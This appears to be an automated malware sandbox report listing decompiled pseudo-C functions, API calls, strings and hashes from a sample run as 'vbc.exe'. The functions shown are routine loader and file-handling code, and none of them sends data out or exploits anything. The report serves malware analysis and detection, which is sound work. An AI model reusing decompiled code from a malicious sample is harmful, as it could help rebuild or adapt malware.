                                          • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                          • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 57%
                                          			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x42ec18");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404CC9(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                          0x00401f51
                                          0x00401f51
                                          0x00401f56
                                          0x00401f5d
                                          0x0040200b
                                          0x00402156
                                          0x00402156
                                          0x0040287d
                                          0x00402880
                                          0x0040288c
                                          0x0040288c
                                          0x00401f6c
                                          0x00401f76
                                          0x00401f79
                                          0x00401f88
                                          0x00401f8c
                                          0x00401f92
                                          0x00401f96
                                          0x00402004
                                          0x00000000
                                          0x00402004
                                          0x00401f98
                                          0x00401fa2
                                          0x00401fa6
                                          0x00401fea
                                          0x00401fa8
                                          0x00401fab
                                          0x00401fae
                                          0x00401fde
                                          0x00401fb0
                                          0x00401fb3
                                          0x00401fbc
                                          0x00401fbe
                                          0x00401fbe
                                          0x00401fbc
                                          0x00401fae
                                          0x00401ff2
                                          0x00401ff9
                                          0x00401ff9
                                          0x00000000
                                          0x00401ff2
                                          0x00401f7c
                                          0x00401f82
                                          0x00401f86
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                            • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041FA6B,74EC110C), ref: 00404D25
                                            • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
                                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                          • String ID: B
                                          • API String ID: 2987980305-3806887055
                                          • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                          • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                          • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                          • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E004054B2(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405449(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                          0x004015b3
                                          0x004015ba
                                          0x004015bd
                                          0x004015c2
                                          0x004015c6
                                          0x004015c8
                                          0x004015d0
                                          0x004015d6
                                          0x004015d8
                                          0x004015db
                                          0x004015e3
                                          0x004015f0
                                          0x004015fd
                                          0x004015fd
                                          0x004015f2
                                          0x004015f3
                                          0x004015fb
                                          0x00000000
                                          0x00000000
                                          0x004015fb
                                          0x004015f0
                                          0x00401600
                                          0x00401603
                                          0x00401605
                                          0x00401606
                                          0x004015c8
                                          0x0040160d
                                          0x0040162d
                                          0x00402156
                                          0x0040160f
                                          0x00401611
                                          0x0040161c
                                          0x00401622
                                          0x00401622
                                          0x00402880
                                          0x0040288c

                                          APIs
                                            • Part of subcall function 004054B2: CharNextA.USER32(dR@), ref: 004054C0
                                            • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                            • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                          • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                          • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                          • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 3751793516-2935972921
                                          • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                          • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                          • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                          • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405631, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                          0x00405635
                                          0x0040563b
                                          0x0040563c
                                          0x0040563c
                                          0x0040563d
                                          0x00405644
                                          0x0040564e
                                          0x0040565b
                                          0x0040565e
                                          0x00405666
                                          0x00000000
                                          0x00000000
                                          0x0040566a
                                          0x00000000
                                          0x00000000
                                          0x0040566c
                                          0x00000000
                                          0x0040566c
                                          0x00000000

                                          APIs
                                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004030E1,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405644
                                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040565E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-1498418707
                                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                          • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                          • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004030AF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E004030AF(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
				E00405B89(_t6);
				_t2 = E0040548B(_t6);
				if(_t2 != 0) {
					E0040541E(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405631("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                          0x004030b0
                                          0x004030b6
                                          0x004030bc
                                          0x004030c3
                                          0x004030c8
                                          0x004030d0
                                          0x004030dc
                                          0x004030e2
                                          0x004030c6
                                          0x004030c6
                                          0x004030c6

                                          APIs
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BE1
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BEE
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BF3
                                            • Part of subcall function 00405B89: CharPrevA.USER32(?,?), ref: 00405C03
                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 4115351271-1176120985
                                          • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                          • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                          • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                          • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42eb90; // 0x290984
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e34c =  *0x42e34c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
					}
				}
				return 0;
			}












                                          0x0040138a
                                          0x004013fa
                                          0x00401392
                                          0x0040139b
                                          0x004013a0
                                          0x00000000
                                          0x00000000
                                          0x004013a2
                                          0x004013a3
                                          0x004013ad
                                          0x00000000
                                          0x00401404
                                          0x004013b0
                                          0x004013b7
                                          0x004013bd
                                          0x004013be
                                          0x004013c0
                                          0x004013c2
                                          0x004013b9
                                          0x004013b9
                                          0x004013ba
                                          0x004013ba
                                          0x004013c9
                                          0x004013cb
                                          0x004013f4
                                          0x004013f4
                                          0x004013c9
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                          • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                          • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                          • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405602, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00405602(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                          0x00405606
                                          0x00405613
                                          0x00405628
                                          0x0040562e

                                          APIs
                                          • GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405606
                                          • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                          • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                          • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                          • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004055E3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004055E3(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                          0x004055e7
                                          0x004055f0
                                          0x00000000
                                          0x004055f9
                                          0x004055ff

                                          APIs
                                          • GetFileAttributesA.KERNEL32(?,004053EE,?,?,?), ref: 004055E7
                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                          • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                          • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403066, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403066(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                          0x0040306a
                                          0x0040307d
                                          0x00403085
                                          0x00000000
                                          0x0040308c
                                          0x00000000
                                          0x0040308e

                                          APIs
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 0040307D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                          • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                          • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                          • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403098, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403098(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                                          0x004030a6
                                          0x004030ac

                                          APIs
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00402DD2,000319E4), ref: 004030A6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                          • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                          • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                          • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00404618, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42eb88; // 0x29056c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42eb70; // 0x2903c0
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42eb79 & 0x00000002;
							if(( *0x42eb79 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
